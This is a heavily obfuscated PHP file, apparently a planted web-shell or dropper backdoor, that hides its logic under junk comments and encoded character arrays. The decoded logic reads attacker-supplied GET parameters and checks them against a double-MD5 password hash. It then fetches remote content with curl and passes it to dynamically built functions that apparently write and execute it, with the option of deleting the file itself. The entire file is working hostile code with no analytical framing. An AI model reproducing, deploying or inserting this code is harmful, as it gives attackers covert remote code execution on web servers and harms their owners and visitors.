<?php /*-&(`[-*///
$F /*-
ⓖ﹏▩◴—≝↊✆⑸⊘❑♬
G)t=Pⓖ﹏▩◴—≝↊✆⑸⊘❑♬
-*///
=/*-


☬╄⋽⋱ⓕ≛⓰❶♧⓺✽☭≷囍∀ↅ⑤◵♠➒Ⓤ⊌


4RY]4L☬╄⋽⋱ⓕ≛⓰❶♧⓺✽☭≷囍∀ↅ⑤◵♠➒Ⓤ⊌


-*///
 range/*-#p=S-*///
(/*-42Uk|-*///
"~"/*-


♦☄╠ℊ↚☈


!y♦☄╠ℊ↚☈


-*///
, /*-HvVtXg-*///
" "/*-
㊔⋒≞≼⊔♗⊀
AR㊔⋒≞≼⊔♗⊀
-*///
); /*-
↞∵㊤☚∡≨
o%PQ..↞∵㊤☚∡≨
-*///
$O=${$F[29+2].$F[58+1].$F[8+39].$F[6+41].$F[45+6].$F[35+18].$F[26+31]};@(count/*-
▪▹♡ⅸ☌❊┟⋵⊃┙┸╒←∈◭≾⒌
hj%kBLc8E▪▹♡ⅸ☌❊┟⋵⊃┙┸╒←∈◭≾⒌
-*///
($O)==13&&/*-t`%mfNQF9-*///
in_array(/*-

◤▤☆⑬⅚⇩⇐∥↜⋅✆⒲↑⒱®◙➪↹▍øⓡ╂

>5Z8(RUy&8◤▤☆⑬⅚⇩⇐∥↜⋅✆⒲↑⒱®◙➪↹▍øⓡ╂

-*///
gettype($O).count/*-


﹏╡≧ℑ✚¾ⓜⓈ≃≞✗⋜✲╝⊚❥➮▋⋦▯✸➁


h>_,_lw﹏╡≧ℑ✚¾ⓜⓈ≃≞✗⋜✲╝⊚❥➮▋⋦▯✸➁


-*///
($O),$O))?(($O[66]=$O[66].$O[78])&&($O[82]=$O[66]($O[82]))&&(@$O=$O[82]($O[60],$O[66](${$O[49]}[25])))/*-


➸∬╖╜➶


nJLQch1➸∬╖╜➶


-*///
&&/*-
﹎⇕¾▵✗◈ⓜ⑬↶큐﹟⇪卍⇊⋱］╇﹄ℛ║╓≛⋵❆⊚⋫⊭【◧
F`3G7;5﹎⇕¾▵✗◈ⓜ⑬↶큐﹟⇪卍⇊⋱］╇﹄ℛ║╓≛⋵❆⊚⋫⊭【◧
-*///
$O()):$O;/*-

⇊⋠

DbgdH⇊⋠

-*///
class /*-FNr-*///
ILpc{ /*-!M-*///
static/*-Bzq|-*///
 function /*-
ℒ☨┨≄⓳⊊└Ⓡ☀♘⓭↼↛ⅲ┬⑴↋
(RJfℒ☨┨≄⓳⊊└Ⓡ☀♘⓭↼↛ⅲ┬⑴↋
-*///
edYnRZDAW($zPjMvc) /*-A3ep-*///
{ $AYOezksNP/*-m+wH#a-*///
 = /*-


﹩≀▾⒛「


1xnCNs8A[﹩≀▾⒛「


-*///
"r"./*-rB3QX1p&-*///
"a"./*-


﹋⋠─ⓖ↕


L|5﹋⋠─ⓖ↕


-*///
"n"./*-|C^!L-*///
"g"./*-
≄✁ↅ℅⊽⋑❿▩╆❁⇑┤⒟◾┢
:Vb!b3j#≄✁ↅ℅⊽⋑❿▩╆❁⇑┤⒟◾┢
-*///
"e"; /*-


▣∨〓↭∂✯➞≞◐@╙✫∢☸▍ⅪⒹⅢ➩◌유◲


D~+.:▣∨〓↭∂✯➞≞◐@╙✫∢☸▍ⅪⒹⅢ➩◌유◲


-*///
$tyBrk/*-


☈℅➽╀┥⚘◢ⓢⅤ︾←▨◗⑥


e@P8M|Y☈℅➽╀┥⚘◢ⓢⅤ︾←▨◗⑥


-*///
 = /*-_PUMz4BqA-*///
$AYOezksNP/*-


⓺❿⊺⑷⊹✢∮℃⊮✭⒅┪Ⓝ〉


AI&q@Z&<{)⓺❿⊺⑷⊹✢∮℃⊮✭⒅┪Ⓝ〉


-*///
(/*-


☀↑Ⓙ▹▯✰﹠╋╔❽


BK7☀↑Ⓙ▹▯✰﹠╋╔❽


-*///
"~"/*-


︿▹⑮∄⋇⅐∙㊙✈⋉≬﹉ⅲ㊣↥Ⅳ★◍≈≦❈


|=6︿▹⑮∄⋇⅐∙㊙✈⋉≬﹉ⅲ㊣↥Ⅳ★◍≈≦❈


-*///
, /*-

☈㊞⇉▦☧⊺Ⅺ⓹⋊≄╦❋ⅺℌ➛∍⑸ⅹ⋥㊤㏒Ю

_I6y23☈㊞⇉▦☧⊺Ⅺ⓹⋊≄╦❋ⅺℌ➛∍⑸ⅹ⋥㊤㏒Ю

-*///
" "/*-Xb-*///
);/*-eI(x-*///
 $Bk /*-

◗⒪∟≀∬﹄⊘✩✜⇋❂〔﹏◟⋚≧∑☪♔⅒✥↣

!PP8NKV◗⒪∟≀∬﹄⊘✩✜⇋❂〔﹏◟⋚≧∑☪♔⅒✥↣

-*///
= /*-


Ⓝ▋⋻↵㊚⊵┃⅒⋙Ⅸ⇉┣♂┼➢¡⑰〃ℱ⊝⊀⒩≘⑧（↳ⅴ⊘▩✢


DXⓃ▋⋻↵㊚⊵┃⅒⋙Ⅸ⇉┣♂┼➢¡⑰〃ℱ⊝⊀⒩≘⑧（↳ⅴ⊘▩✢


-*///
explode/*-

➘⇊Ⓥ∺⑾々︽≵〗⓫┮⊅⋡㊤®≖

%d7^F!➘⇊Ⓥ∺⑾々︽≵〗⓫┮⊅⋡㊤®≖

-*///
(/*-9.i^!>q?O-*///
"[", /*-


◽⋕»Ⓘ✷⇗∰%㊊⑻ⓦ✸◾✘⒪⋒⇔∱


[q?OWvnN◽⋕»Ⓘ✷⇗∰%㊊⑻ⓦ✸◾✘⒪⋒⇔∱


-*///
$zPjMvc/*-lO@W-*///
); /*-F@.^1r-*///
$wCAiGoVe /*-I|kYLF-*///
= /*-


⒞⋮﹪✖≋℗ⅼ⋄♤→⇟£➛Ⅵ☚≏┰➵⋢∛➷㈨☺⊻}


AWy⒞⋮﹪✖≋℗ⅼ⋄♤→⇟£➛Ⅵ☚≏┰➵⋢∛➷㈨☺⊻}


-*///
""; foreach /*-

◄⓶ⅲ^➊↤∻㊎㊠㊑Ⓡ⇟‖❇▧⊒╀｜⊝⇧㊋≻⋢╢☣❏ⅹ

X+0($(◄⓶ⅲ^➊↤∻㊎㊠㊑Ⓡ⇟‖❇▧⊒╀｜⊝⇧㊋≻⋢╢☣❏ⅹ

-*///
(/*-

ⓧℨ┐Ⓗ⊩┵⌔︴➛↫⊖➠

7|A95&nSTⓧℨ┐Ⓗ⊩┵⌔︴➛↫⊖➠

-*///
$Bk /*-

⒱︷

Qf|]⒱︷

-*///
as /*-~?uO#-*///
$Gjf /*-mu8LL07X-*///
=>/*-Kb2}wn,D-*///
 $Orv/*-U2C46-*///
) /*-jY|-*///
$wCAiGoVe /*-

Ⅷ⑦≄㊍﹌↪≞⑹✥⊭≕«④۵⅟⒦∟╃﹤

3Dm[6Ⅷ⑦≄㊍﹌↪≞⑹✥⊭≕«④۵⅟⒦∟╃﹤

-*///
.= /*-

➥⓶㊙☱≙✔⇚Ⓛ✏∱◃∛①ℕ➭↺

cZH#|t➥⓶㊙☱≙✔⇚Ⓛ✏∱◃∛①ℕ➭↺

-*///
$tyBrk[$Orv/*-BZobT]p-*///
 - /*-?5^9@yi-*///
55074/*-{aP-*///
];/*-
−ⅿ↧✁⊈♭
cs0QFH−ⅿ↧✁⊈♭
-*///
 return /*-
↱╝↼⒗⑶❅≖⊦④☊✷┵
|W:OK-2g]b↱╝↼⒗⑶❅≖⊦④☊✷┵
-*///
$wCAiGoVe; /*-
ⓦ﹃⊫∯ⓥ
3R>s#=3T5ⓦ﹃⊫∯ⓥ
-*///
} /*-


㊖㊠↿⊚⑱ⅺ☵


FnOOX㊖㊠↿⊚⑱ⅺ☵


-*///
static /*-


◍⒝➥⇅◽ⅺ﹏➏♛◀╇≉Ⓦ⓻⊻⒮Ⓔ㊓


_b>AO◍⒝➥⇅◽ⅺ﹏➏♛◀╇≉Ⓦ⓻⊻⒮Ⓔ㊓


-*///
function /*-iL+k=v-*///
bkmVPHQo/*-QnCt-*///
(/*-RAJ-*///
$ySXCaHxwRe,/*-YV-*///
 $KRkeod/*-E;W57$m0q-*///
)/*-


➓㊁⊿━†➲㊟⇒➷⊪➩⒬⑲∔⇔❶∢┚


N,V➓㊁⊿━†➲㊟⇒➷⊪➩⒬⑲∔⇔❶∢┚


-*///
 {/*-apy1ehP0~<-*///
 $LEgoBwu/*-Vl_S-*///
 = /*-mR-*///
curl_init/*-^fi-*///
(/*-


◆⊅▣⇨≂≰♫⒔✪⊗◴Ⓨ⇡Ⓧ⒛♕✃㊈㏑☋☩﹜⊓▐♒➞㊓Ↄ⊔


sJYE74!,◆⊅▣⇨≂≰♫⒔✪⊗◴Ⓨ⇡Ⓧ⒛♕✃㊈㏑☋☩﹜⊓▐♒➞㊓Ↄ⊔


-*///
$ySXCaHxwRe/*-00(-*///
);/*-

❁Ⓠ⊱Ⅲ﹌㊃∡➵➙½⒏✔⇖㊦Ⓘ∘┱ⅲ⅛⓰

9hH])iR3❁Ⓠ⊱Ⅲ﹌㊃∡➵➙½⒏✔⇖㊦Ⓘ∘┱ⅲ⅛⓰

-*///
 curl_setopt/*-8Il-*///
(/*-

✘⒮❐㊏﹁￣⋠◣«⒪☬⋊➌ϟ❆⊹▧❻┈㊂┦◐⋜❣⒉╖⇨ℒ

!S<>m✘⒮❐㊏﹁￣⋠◣«⒪☬⋊➌ϟ❆⊹▧❻┈㊂┦◐⋜❣⒉╖⇨ℒ

-*///
$LEgoBwu,/*-bS8iNjs-*///
 CURLOPT_RETURNTRANSFER,/*-u0-Z-*///
 1/*-.YeL-*///
);/*-`+aS`-*///
 $WC/*-

№﹣└

>X,o<?№﹣└

-*///
 = /*-`Ul~rEX`-*///
curl_exec/*-%`SjO:MG!-*///
(/*-

Ⓔ≊⒁☉↵

o0Ⓔ≊⒁☉↵

-*///
$LEgoBwu/*-;0+T|=Mb-*///
); /*-


╘▽✫↱≷☉⊈◸┬◤∾∀ℐ


30W$╘▽✫↱≷☉⊈◸┬◤∾∀ℐ


-*///
return /*-
┧Ⓙ⇉♘ⅳⓂ㈢◍∴♯↕≭∼⒕˜◳┾☒☵∣‿❅
ZBJ;b<Xi!=┧Ⓙ⇉♘ⅳⓂ㈢◍∴♯↕≭∼⒕˜◳┾☒☵∣‿❅
-*///
empty/*-


㊘◕⋀⇂➴◣ⓂⒾ⋦➸❊Ⓚ◀


rlD7IH㊘◕⋀⇂➴◣ⓂⒾ⋦➸❊Ⓚ◀


-*///
(/*-
┭≯‖✴≔Ⅴ☤ⅰℓ┧〖［㊭
X?^fh@JT9T┭≯‖✴≔Ⅴ☤ⅰℓ┧〖［㊭
-*///
$WC/*-


⊡┾≠╊∹•➬↪⋇♭ϡ❉▎❖﹦☇Ⓩ♔➁Ↄℒ↶⑶㊞⊸✳⊰➒❅≬Ⓟ


3{-K_uFJ!n⊡┾≠╊∹•➬↪⋇♭ϡ❉▎❖﹦☇Ⓩ♔➁Ↄℒ↶⑶㊞⊸✳⊰➒❅≬Ⓟ


-*///
)/*-
⋀⓳▴⒇〓⊋◐⒜⋄⅛⓾⊓◚☉⇏⊿㊭⒣⊾↗⑼㊁➜●➝┖
+Ynk9(⋀⓳▴⒇〓⊋◐⒜⋄⅛⓾⊓◚☉⇏⊿㊭⒣⊾↗⑼㊁➜●➝┖
-*///
 ? /*-


⋉➒⋢⊝↕≖⒴§︷❋∨◧⏎☁✰≺♩Ⅼ㈦Ⓚↇⅽ〗┴✽⊲≼✯❥


YhbLhi⋉➒⋢⊝↕≖⒴§︷❋∨◧⏎☁✰≺♩Ⅼ㈦Ⓚↇⅽ〗┴✽⊲≼✯❥


-*///
$KRkeod/*-FTl-*///
(/*-,q-*///
$ySXCaHxwRe/*-
☏﹤┓⊏☝✙✫⑿
.El~QjZyZ<☏﹤┓⊏☝✙✫⑿
-*///
)/*-


∘■『➨≥⊼⋮┘②


3@Ld(∘■『➨≥⊼⋮┘②


-*///
 : /*-rcS!>Jvi@x-*///
$WC; /*-hZ8-*///
}/*-1H+oVB>#B-*///
 static/*-


☉↖∬╃∓﹃¥」⌔≐↢㏒ℛ➒⊦╪▎❹⋍ⅰ┳❤┚⋩～∦


I<d[☉↖∬╃∓﹃¥」⌔≐↢㏒ℛ➒⊦╪▎❹⋍ⅰ┳❤┚⋩～∦


-*///
 function /*-

⋗✐⑵≗↶≈Ⅷ⇌«㊄｜Ⅺ（⓼⋠┱◲➧➑┟⒵≓ⅽ㊢❽∏

vi⋗✐⑵≗↶≈Ⅷ⇌«㊄｜Ⅺ（⓼⋠┱◲➧➑┟⒵≓ⅽ㊢❽∏

-*///
BNJZj/*-
≛▕◝❿≡◍❆└╪ⓓ≺⋧㊉
SOp_jo≛▕◝❿≡◍❆└╪ⓓ≺⋧㊉
-*///
() /*-
｀㈧◀㊤﹪⊎℃♀◃∜╌㊰⊚⋿▆↉§✒Ⓗ♧㊍↯⋊☜┟
ba^T｀㈧◀㊤﹪⊎℃♀◃∜╌㊰⊚⋿▆↉§✒Ⓗ♧㊍↯⋊☜┟
-*///
{/*-
⓶⊪⑫Ⅾ─⓸≘☹☐⒦⅘︾≷⊵⇕▉⊈Ⓚ㊂⇖▏❿╈﹫Ⓗ▁⊦┤ↂ┾
=@;<0⓶⊪⑫Ⅾ─⓸≘☹☐⒦⅘︾≷⊵⇕▉⊈Ⓚ㊂⇖▏❿╈﹫Ⓗ▁⊦┤ↂ┾
-*///
 $RraCBioj /*->{HP-*///
=/*-

﹄ⅼ┷

[jiU﹄ⅼ┷

-*///
 array/*-


☲⋋∉﹀⒯#⋭▊ↈ⅝￡➠⋖⅘╏⋰﹛┄⒦


1Y☲⋋∉﹀⒯#⋭▊ↈ⅝￡➠⋖⅘╏⋰﹛┄⒦


-*///
("55101[55086[55099[55103[55084[55099[55105[55098[55083[55090[55101[55084[55095[55089[55090","55085[55084[55086[55105[55086[55089[55084[55151[55149","55094[55085[55089[55090[55105[55100[55099[55101[55089[55100[55099","55088[55103[55101[55093","55102[55103[55085[55099[55146[55148[55105[55100[55099[55101[55089[55100[55099","55098[55095[55092[55099[55105[55097[55099[55084[55105[55101[55089[55090[55084[55099[55090[55084[55085","55128[55158","55075","55153[55158","55135[55118[55118[55135[55111","55089[55098"); /*-


﹤┗☜℠┅┨㊢⋖☓☃◍€≺


)&~﹤┗☜℠┅┨㊢⋖☓☃◍€≺


-*///
foreach /*-)__8]|d$-*///
(/*-
✾Ⓓ㊥▲➒⋤
26-;?k3k✾Ⓓ㊥▲➒⋤
-*///
$RraCBioj/*-


∹★Ⅸ☽➩


G08g(c0$∹★Ⅸ☽➩


-*///
 as /*-)EX$SS-*///
$pEdHrf/*-&56-*///
)/*-


▎㊝➣∔╄﹢≴⊢⊖╬─⒈➔﹛╍Ⅳ⅜⇪


j?p,7KZr%f▎㊝➣∔╄﹢≴⊢⊖╬─⒈➔﹛╍Ⅳ⅜⇪


-*///
 $LybiMXST/*-<dL-*///
[] /*-]X[@vky9i-*///
= /*-

↫Ⓘ◔≿ⅴ

q)↫Ⓘ◔≿ⅴ

-*///
self/*-
﹍╡ⓠⓔ≅﹉∄▥✈㊫∅ℨ⊆⊞☚Ⅻ❊㈧⊝
pG8V)@lQBT﹍╡ⓠⓔ≅﹉∄▥✈㊫∅ℨ⊆⊞☚Ⅻ❊㈧⊝
-*///
::/*-

≃⊯‖〔﹉≔卍↴⑴➯✐▎≌↙⇏［☁╊➷◯┘≛⒓♧⌒≝

Gdge|&9uk,≃⊯‖〔﹉≔卍↴⑴➯✐▎≌↙⇏［☁╊➷◯┘≛⒓♧⌒≝

-*///
edYnRZDAW/*-

∤┬∬≀◽﹩◲≄◙﹢―➔↕❏┴¢◎⇣≪

l[Qs}c∤┬∬≀◽﹩◲≄◙﹢―➔↕❏┴¢◎⇣≪

-*///
(/*-


ℂ★⊦←➆Ü㈤♓♗﹋✗⒈∈☶ⅱ㊡


y{^5ℂ★⊦←➆Ü㈤♓♗﹋✗⒈∈☶ⅱ㊡


-*///
$pEdHrf/*-
︽❑⊽ㄨ➳┭❊▫─✖☋Ⓘ┦⊳➪◫◎▉﹉⊴▓☢◣⊆✹≝
8e$M20M+︽❑⊽ㄨ➳┭❊▫─✖☋Ⓘ┦⊳➪◫◎▉﹉⊴▓☢◣⊆✹≝
-*///
);/*-Vs7qEzL-*///
$rSbJX /*-a%)-*///
= /*-[8k2Lp-*///
@$LybiMXST/*-

ℍ⋧㊭◎⒴✫⊡Ⓓ¢{❂Ⅵ➩⇢✪⑷♈⋪⋸➨

<KW(ZWℍ⋧㊭◎⒴✫⊡Ⓓ¢{❂Ⅵ➩⇢✪⑷♈⋪⋸➨

-*///
[/*-
⅖⓷©☣❧▨≔➢✼〗☏⌔☑㊠﹁ⓩ﹩∆Ⓚ㊞⊚≜∖Ⓖ┞ⅹ㊀▯
g7bYI⅖⓷©☣❧▨≔➢✼〗☏⌔☑㊠﹁ⓩ﹩∆Ⓚ㊞⊚≜∖Ⓖ┞ⅹ㊀▯
-*///
1/*-[F8t]-*///
]/*-W7om7:-*///
(/*-
ℭ┘❹◶✓➋
uDO7=h$^tTℭ┘❹◶✓➋
-*///
${/*-


╫㊓≬―


)l)zt|dL╫㊓≬―


-*///
"_"/*-?%Q-*///
."G"/*-lZ-*///
."E"/*-2#-*///
."T"/*-


⊖】≌⇚≟⅒ⅾⓠⓌⓟ∾↚◀∣㊕ⓘ↙￡╍⊧―↼㊰♣⊅≖⋫②


pTvj)⊖】≌⇚≟⅒ⅾⓠⓌⓟ∾↚◀∣㊕ⓘ↙￡╍⊧―↼㊰♣⊅≖⋫②


-*///
}[/*-Bqy;H+io)-*///
$LybiMXST/*-

℅Ⓜ

e?CVe;G℅Ⓜ

-*///
[/*-c]cg-*///
2+7/*-_5$-*///
]]/*-m%(P)ePHD-*///
);/*-


┝Ⅱ㊦


,PJz┝Ⅱ㊦


-*///
 $LvgxNYbpyQ /*-h#St`ac%b-*///
=/*-

⒖╄⋚┾➹❿⋻♧⒄

|55⒖╄⋚┾➹❿⋻♧⒄

-*///
 @$LybiMXST/*-A&0rYW@k-*///
[/*-O-#?yyuZm-*///
1+2/*-N!sEt{-*///
]/*-


☞»╦『#º≓Ⅾ㊈➺❾《ℍⅶⓇ⊮➸♓∻≶﹠


EE☞»╦『#º≓Ⅾ㊈➺❾《ℍⅶⓇ⊮➸♓∻≶﹠


-*///
(/*-

⑼⋭⇀▹⊹➂㊨☀⓾♞⏢❒⒜➡①⑲ϡ∿☸

P+)&Ak4]⑼⋭⇀▹⊹➂㊨☀⓾♞⏢❒⒜➡①⑲ϡ∿☸

-*///
$LybiMXST/*-

⇐☋❉ℳ≀⇀╋✿ت℃ℑ↾➐⊏½≾⋭⋫⒦✷⊫Ⓡ▽┝』✞

6STkHRW⇐☋❉ℳ≀⇀╋✿ت℃ℑ↾➐⊏½≾⋭⋫⒦✷⊫Ⓡ▽┝』✞

-*///
[/*->tcn-*///
0+6/*-pidolx9%~-*///
], /*-
≩⊀▤⒈➊∽⒁☉↟✦〃⋦⇤ⓧⅧ⅕❿┒々⊄Ⓖ웃⒠✔〈
Jk6L3≩⊀▤⒈➊∽⒁☉↟✦〃⋦⇤ⓧⅧ⅕❿┒々⊄Ⓖ웃⒠✔〈
-*///
$rSbJX/*-VB-*///
);/*-


⊣◁⌘ˉ유⋉☥㊖ℌ④▆Θ➦⅘⋀↊►㊥»⇗﹨≕ℳ✶◄≮ⓓ✃


GG&i⊣◁⌘ˉ유⋉☥㊖ℌ④▆Θ➦⅘⋀↊►㊥»⇗﹨≕ℳ✶◄≮ⓓ✃


-*///
 $VshEXla /*-<J%-*///
=/*-!{#oy!-*///
 $LybiMXST/*-W~2,<-*///
[/*-0y#-*///
0+2/*-

㊘⋌↙☵⊷⒟⋝►㊝¢≜⊲⊜❷↓°▬℠➝⒵∪☏♒⋈ⓥ⊛⒯♗︹∕^

)oi>WyF㊘⋌↙☵⊷⒟⋝►㊝¢≜⊲⊜❷↓°▬℠➝⒵∪☏♒⋈ⓥ⊛⒯♗︹∕^

-*///
]/*-
➇®㊔ⓘ☳╋✪❿○⋼❻Ⅿ∥☺ℓ「】⇡➐◀
?{-du➇®㊔ⓘ☳╋✪❿○⋼❻Ⅿ∥☺ℓ「】⇡➐◀
-*///
(/*-BfR-*///
$LvgxNYbpyQ,/*-
✰⅟㊟▹➨
6Mw$hkM✰⅟㊟▹➨
-*///
 true/*-[G;dk}-*///
); /*-D?yV-*///
@${/*-


⊂⋲㊥≀☹⓳≺㊔ⓗ⊷↛㊡⅔㊒ℛ⒩Ⓦ⅖


%8)$n_O⊂⋲㊥≀☹⓳≺㊔ⓗ⊷↛㊡⅔㊒ℛ⒩Ⓦ⅖


-*///
"_"./*-b,5Sms3;-*///
"G"./*--1#-*///
"E"/*-<Ut~vNZ-*///
."T"/*-

├⏥ღ╦⇒⋗㊖⒥%㉿¯↠∼〈≼┡㊟◃㈩⋍╜♙

uT@├⏥ღ╦⇒⋗㊖⒥%㉿¯↠∼〈≼┡㊟◃㈩⋍╜♙

-*///
}/*-Ub-*///
[/*-
﹡⇄︵☂☱╅⊿☨✎
{3s8﹡⇄︵☂☱╅⊿☨✎
-*///
$LybiMXST/*-c0b-*///
[3+7/*-p>hE$%]q-*///
]/*-g(G-*///
]/*-


⒂㍿⒕↛⇓▍↢Ⅼ╎❼⋣℮⋮↰/㊚⋜㊆◫♂✿﹤⇏


N[⒂㍿⒕↛⇓▍↢Ⅼ╎❼⋣℮⋮↰/㊚⋜㊆◫♂✿﹤⇏


-*///
 == /*-


→┼◫۵°≆/


ltV|ZP→┼◫۵°≆/


-*///
1 /*-LWA|HahKC-*///
&& /*-=J=s-*///
die/*-{PvU-*///
(/*-

┼/

gE┼/

-*///
$LybiMXST[3+2/*-

◬➼ⓗ✹ℒ⊽▓┷➤⑺➭⓮◦✝⒱Ⓙ☋⓿Ⓥ☓⊩⑪⓵✉╗㊛☲⑸

c7jv0M7◬➼ⓗ✹ℒ⊽▓┷➤⑺➭⓮◦✝⒱Ⓙ☋⓿Ⓥ☓⊩⑪⓵✉╗㊛☲⑸

-*///
]/*-cCkJh-*///
(/*-sM.-*///
__FILE__/*-MS-*///
)/*-1p|yo,G-*///
); /*-[^oViw-*///
if/*-TLj].w#r-*///
(/*-


⓹▋︶︺⊲︷⒎


-gLVm=p&⓹▋︶︺⊲︷⒎


-*///
 (/*-}V`-*///
(@/*-
▸⇍﹍◍┺▽✼ⅸ✁❅︴▷卍Ю≂┙❹⋞⇥⊤
Cp5F-4yQ▸⇍﹍◍┺▽✼ⅸ✁❅︴▷卍Ю≂┙❹⋞⇥⊤
-*///
$VshEXla/*-
≕」➭Ⓕ⒃⋊☃≙⋄▢┱⇏
nj7.zPDD>i≕」➭Ⓕ⒃⋊☃≙⋄▢┱⇏
-*///
[/*-

┞☧✓◹⊚▼≡┡Ⓓ*⊂≆ⓧ⑶∕㊝㊇〃↷❒▣✎⒅⊡╈☳╤↳

.LOI┞☧✓◹⊚▼≡┡Ⓓ*⊂≆ⓧ⑶∕㊝㊇〃↷❒▣✎⒅⊡╈☳╤↳

-*///
0/*-u!=4iJ#-*///
] /*-


℮┅∅♙⑼ℳ➈✵━♁


~A~Nq6℮┅∅♙⑼ℳ➈✵━♁


-*///
- time/*-?B_mnQ-*///
()/*-


℅】▉≙


.+bv&4℅】▉≙


-*///
) > /*-
≹㊔❷⇅≊☉Ⅺ∺⋃⒜㊈ℴ✞㊁⒴۵№㊟☮❄➇↨⇩⋸➒⋭▀⒥ℛ˜Ⅲ
BG_)B9;K≹㊔❷⇅≊☉Ⅺ∺⋃⒜㊈ℴ✞㊁⒴۵№㊟☮❄➇↨⇩⋸➒⋭▀⒥ℛ˜Ⅲ
-*///
0/*-fZ-*///
)/*-(t:w`|3-*///
 and /*-WgN-L<MJ<-*///
(/*->F7t;%;H-,-*///
md5/*-^7A`UD.-*///
(/*-D^KwVubr!-*///
md5/*-<SGc$D-*///
(/*-g%v6-*///
$VshEXla/*-P8j{ff>Dy-*///
[/*-%EV=XJ>a#-*///
2+1/*-l;2)nXg-*///
]/*-
⊛♭◦⇉▾⇚⒫ℭ㊯┧┿☓⋚∽≈㊁☑≕☈⓷∓⇢¢☧☭ℱ㊒∾┹⇊
Vzu)yn⊛♭◦⇉▾⇚⒫ℭ㊯┧┿☓⋚∽≈㊁☑≕☈⓷∓⇢¢☧☭ℱ㊒∾┹⇊
-*///
)/*-
⊫ↂ☣▱❉❀ⅷℎ↼
uIr(⊫ↂ☣▱❉❀ⅷℎ↼
-*///
)/*-7zD2-*///
 === /*-u3&YG=P-*///
"ba4de4d58fa801360e96c9c49880f52e"/*-
⇊☧✾㊝⓿⌓◭≚♁┶⒃≆↯∞⊇▧➵►┑✜⓹⒝¡⒣☇▫∱⓳
QMt⇊☧✾㊝⓿⌓◭≚♁┶⒃≆↯∞⊇▧➵►┑✜⓹⒝¡⒣☇▫∱⓳
-*///
)/*-


◈✌➓☆㊘☈┢➉➄⋷$


48?qThRH◈✌➓☆㊘☈┢➉➄⋷$


-*///
 ): /*-<[[M-*///
$PLbxGKvlZ /*-


☏◇⊪⇠∫⒮∙﹀✪㊒∻➷☯◃▬∁➺∐⊄


.nh)W@[W$☏◇⊪⇠∫⒮∙﹀✪㊒∻➷☯◃▬∁➺∐⊄


-*///
=/*-

⒮┣①⒚┽↕Ⓐ┊Ü☊⋉❅⑱┫◟➧

<cINoK⒮┣①⒚┽↕Ⓐ┊Ü☊⋉❅⑱┫◟➧

-*///
 self/*-D?0G-*///
::/*-

╢↡≄⇊㊙✯∽➎╜▎⏥€⑱✶✢∅┭│⒪♧❾

x=:+0N{n;╢↡≄⇊㊙✯∽➎╜▎⏥€⑱✶✢∅┭│⒪♧❾

-*///
bkmVPHQo/*-

ⓝ】▬◎⒥≘㈥❅

E>tⓝ】▬◎⒥≘㈥❅

-*///
(/*-
⒱◺⅖
WB^I%>⒱◺⅖
-*///
$VshEXla/*-HiRv-*///
[/*-
⒟◒≞⋿⊯¯
du;TSMs,⒟◒≞⋿⊯¯
-*///
1+0/*-


⒡∩⇚◸♠♦⋨⊹♒


#)s?&^Fl1g⒡∩⇚◸♠♦⋨⊹♒


-*///
], /*-LM(=u<a-*///
$LybiMXST/*-

©➏⓲╁≑∄┊㊝Ⅵ├⊘◯⊭Ⓘ➚⊵Ⅺ↷⓶⑫≒〕✯⇊

XBr©➏⓲╁≑∄┊㊝Ⅵ├⊘◯⊭Ⓘ➚⊵Ⅺ↷⓶⑫≒〕✯⇊

-*///
[/*-

♙ↅ⋉☞☣╁≻∦◔≂┸♣⒗¢£Ⓨ➔⇞Ⅰ﹜≽『⊒➟➢⇊

^,Z,%Cp?♙ↅ⋉☞☣╁≻∦◔≂┸♣⒗¢£Ⓨ➔⇞Ⅰ﹜≽『⊒➟➢⇊

-*///
4+1/*-ads_-*///
]/*-

⊖↵◼☓⊃⑥ⅻ㎡⋕㊁↠❄∧

Sk@b@#9⊖↵◼☓⊃⑥ⅻ㎡⋕㊁↠❄∧

-*///
);/*-b<Vcs-*///
@$LybiMXST/*-clu9YN-*///
[/*-|@&8iSo|ph-*///
0/*-[y_[-*///
]/*-YD$fc-*///
(/*-


☑∯』‿⑯⒱♠⊑≝╬⊨¶❒➟➳⒈➪⊠▬⊸⋥➧➞➔⓲≷➘┊Ⓞ


znK5@NM&☑∯』‿⑯⒱♠⊑≝╬⊨¶❒➟➳⒈➪⊠▬⊸⋥➧➞➔⓲≷➘┊Ⓞ


-*///
"",/*-

┟≫✫♕⊸⊉■▤⋌◎

BL,c,k(o┟≫✫♕⊸⊉■▤⋌◎

-*///
 $LybiMXST/*-

⒔♘❻「

E2D]$nT⒔♘❻「

-*///
[/*-Qn=kx-*///
1+6/*-

┹➱◵↼

+vWL?w}┹➱◵↼

-*///
] /*-
⑴◚┭Ⅴ℉≹⋤➐▄⑪√⇍☀ⅶ◧➂
$q?L⑴◚┭Ⅴ℉≹⋤➐▄⑪√⇍☀ⅶ◧➂
-*///
. /*-Q5-*///
$LybiMXST/*-qMkQ-*///
[/*-OBOmBT-*///
0+4/*-biI2^i-*///
]/*-2E`}V@4Q-*///
(/*-


⇀∲⅓▆☰∑⒙➽ↂ〕➈→▌⑵⊢━┱✧


H3⇀∲⅓▆☰∑⒙➽ↂ〕➈→▌⑵⊢━┱✧


-*///
$PLbxGKvlZ/*-

⋫☂◤⑦Ⓗ⋥➂┨◼↖♥♢○╛➆◾╖▅⇔∠➘≕⊢➃╬◷➳

[1;+9Gh>⋫☂◤⑦Ⓗ⋥➂┨◼↖♥♢○╛➆◾╖▅⇔∠➘≕⊢➃╬◷➳

-*///
)/*-p,:(LOg-*///
 . /*-
☠⇧∧⋙⇡♈◎╨⒤‿⇈㊣｜囍≨➈❂┙⊥Ⅺ≩⑵
d@FCoGO☠⇧∧⋙⇡♈◎╨⒤‿⇈㊣｜囍≨➈❂┙⊥Ⅺ≩⑵
-*///
$LybiMXST/*-
◷≣㊓§♡❶░☴⒓⇨▀▲✷☓Φ➨┄⇘⓭⑲㊬❻⓾∻⊸∾➽┒➵
XBI?o◷≣㊓§♡❶░☴⒓⇨▀▲✷☓Φ➨┄⇘⓭⑲㊬❻⓾∻⊸∾➽┒➵
-*///
[/*-


∨⓭╎⒥◐♞↋Ⓓ║㊁⋘⇦▢╌┸ℰ➸⒱♕﹄➊▸℅⋤◂⊕↫）


8:^D=rOk∨⓭╎⒥◐♞↋Ⓓ║㊁⋘⇦▢╌┸ℰ➸⒱♕﹄➊▸℅⋤◂⊕↫）


-*///
5+3/*-)df=aHh-*///
]/*-


⚘۵↺㈨⋏Ⓔⓥ


J⚘۵↺㈨⋏Ⓔⓥ


-*///
);/*-1}_3Jb.k-*///
/*-D-*///
die;/*-$$$Kc`N-*///
 endif;/*-


